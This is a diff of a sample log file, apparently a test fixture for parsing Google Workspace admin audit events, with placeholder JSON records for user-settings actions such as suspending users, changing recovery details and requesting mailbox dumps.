-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_TITANIUM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UPDATE_BIRTHDATE","parameters":[{"name":"BIRTHDATE","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CREATE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DOWNGRADE_USER_FROM_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USER_ENROLLED_IN_TWO_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_USERLIST_CSV"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"MOVE_USER_TO_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"RENAME_USER","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_STRONG_AUTH","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"SUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNDELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNSUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UPGRADE_USER_TO_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"0"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GENERATE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_DEVICE_TOKENS","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_TOKEN","parameters":[{"name":"APP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GRANT_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_ASP","parameters":[{"name":"ASP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"TOGGLE_AUTOMATIC_CONTACT_SHARING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"1"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CANCEL_USER_INVITE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_CUSTOM_FIELD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_CUSTOM_FIELD","value":"custom"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_EXTERNAL_ID","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_GENDER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_IM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ENABLE_USER_IP_WHITELIST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_KEYWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LANGUAGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LOCATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ORGANIZATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_PHONE_NUMBER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_RELATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ADDRESS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CREATE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"},{"name":"EMAIL_MONITOR_LEVEL_CHAT","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL","value":"info"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CREATE_DATA_TRANSFER_REQUEST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DESTINATION_USER_EMAIL","value":"dest@example.com"},{"name":"APPLICATION_NAME","value":"a,b,c"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GRANT_DELEGATED_ADMIN_PRIVILEGES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_ACCOUNT_INFO_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_FIRST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GMAIL_RESET_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"GMAIL_RESET_REASON","value":"reason"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_LAST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_ADDED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_REMOVED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ADD_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REMOVE_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD_ON_NEXT_LOGIN","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_PENDING_INVITES_LIST"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REQUEST_ACCOUNT_INFO","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REQUEST_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_EXPORT_INCLUDE_DELETED","value":"true"},{"name":"EMAIL_EXPORT_PACKAGE_CONTENT","value":"contents"},{"name":"SEARCH_QUERY_FOR_DUMP","value":"foo bar"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}}
